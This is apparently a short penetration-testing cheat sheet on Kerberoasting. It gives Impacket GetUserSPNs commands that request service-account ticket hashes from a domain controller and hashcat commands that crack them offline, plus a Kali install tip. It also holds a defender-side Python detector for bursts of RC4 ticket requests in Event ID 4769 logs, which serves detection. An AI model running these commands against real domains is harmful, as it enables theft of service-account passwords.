Kerberoasting

GetUserSPNs.py

#Any authenticated domain user can request a TGS from any DC for any service whose SPN is registered on a user (service) account rather than on a host (computer) account. The DC does not check whether the requesting user is authorised to use that service. The returned ticket is encrypted with the service account's long-term key (for RC4, etype 23, that key is the NT hash), so if the service account's password is weak the ticket can be cracked offline.

cd Impacket/examples

#Search for SPN's with no credentials

GetUserSPNs.py domain.loc/username -dc-ip 10.0.0.1 -no-pass

#Search for SPN's with credentials

GetUserSPNs.py domain.loc/username:Password -dc-ip 10.0.0.1

#Search for SPN's with credentials and request hash

GetUserSPNs.py domain.loc/username:Password -dc-ip 10.0.0.1 -request -outputfile kerb.txt

#Cracking the hash (Kerberos 5 TGS-REP etype 23)

hashcat -m 13100 -a 0 kerb.txt rockyou.txt --force

#Show the cracked password(s)

hashcat -m 13100 --show kerb.txt
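As an added defender-side example (not code from the original page), the following Python flags the request pattern described above in Windows Security Event ID 4769 records: one account requesting RC4 (etype 23 / 0x17) service tickets for many distinct service accounts in a short window. The 4769 field names are real; the threshold, window and sample events are assumptions and constructed data.

```python
# Added detection example, not code from the original page: flag likely Kerberoasting
# in Windows Security Event ID 4769 records. The sweep on this page requests an RC4
# (etype 23 = 0x17) ticket for every user-account SPN at once, so one requester asking
# for many distinct non-host services with RC4 in a short window is the signal.
from collections import defaultdict
from datetime import datetime, timedelta
RC4_ETYPE = "0x17"           # the only etype hashcat -m 13100 cracks
DISTINCT_SPN_THRESHOLD = 5   # assumption: tune per environment
WINDOW = timedelta(minutes=5)

def _ev(time, user, service, etype):  # minimal constructed 4769 record
    return {"TimeCreated": time, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype}

SAMPLE_EVENTS = (  # constructed sample data, not real telemetry
    # one account pulls RC4 tickets for six service accounts in under a minute
    [_ev(f"2024-01-10T09:00:{10 + i:02d}", "alice@DOMAIN.LOC", f"svc_app{i}", "0x17") for i in range(6)]
    # an RC4 ticket for a host SPN (computer account) is ignored
    + [_ev("2024-01-10T09:01:00", "alice@DOMAIN.LOC", "FILESRV01$", "0x17")]
    # AES (0x12) tickets for the same services are not crackable this way: not flagged
    + [_ev(f"2024-01-10T09:02:{i:02d}", "bob@DOMAIN.LOC", f"svc_app{i}", "0x12") for i in range(6)]
    # a single RC4 request stays below the threshold
    + [_ev("2024-01-10T09:03:00", "carol@DOMAIN.LOC", "svc_sql", "0x17")]
)

def is_host_spn(service_name):
    # computer accounts end in '$'; krbtgt tickets are TGTs, not roastable service tickets
    return service_name.endswith("$") or service_name.lower() == "krbtgt"

def find_kerberoast_suspects(events, threshold=DISTINCT_SPN_THRESHOLD, window=WINDOW):
    """{requester: sorted services} for accounts with >= threshold distinct RC4 user-SPN requests in window."""
    per_user = defaultdict(list)
    for ev in events:
        if ev["TicketEncryptionType"].lower() != RC4_ETYPE or is_host_spn(ev["ServiceName"]):
            continue
        per_user[ev["TargetUserName"]].append(
            (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))
    suspects = {}
    for user, reqs in per_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):  # sliding window over time-sorted requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = {svc for _, svc in reqs[start:end + 1]}
            if len(distinct) >= threshold:
                suspects[user] = sorted(distinct)
                break
    return suspects
```

Feed it the 4769 events exported from your SIEM as dicts with the same field names; accounts whose SPNs are AES-only (0x12) never appear, which is also the mitigation side of the same picture.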

Note:

GetUserSPNs.py, when installed from the GitHub repository, can fail with the following error:

'NoneType' object has no attribute 'getCredential'

Install the Kali packaged version instead with the following command:

sudo apt install python3-impacket

The command name changes to impacket-GetUserSPNs and no longer requires changing into the examples directory:

impacket-GetUserSPNs fqdn.com/svc_user:Password1234 -dc-ip 10.0.0.1 -request
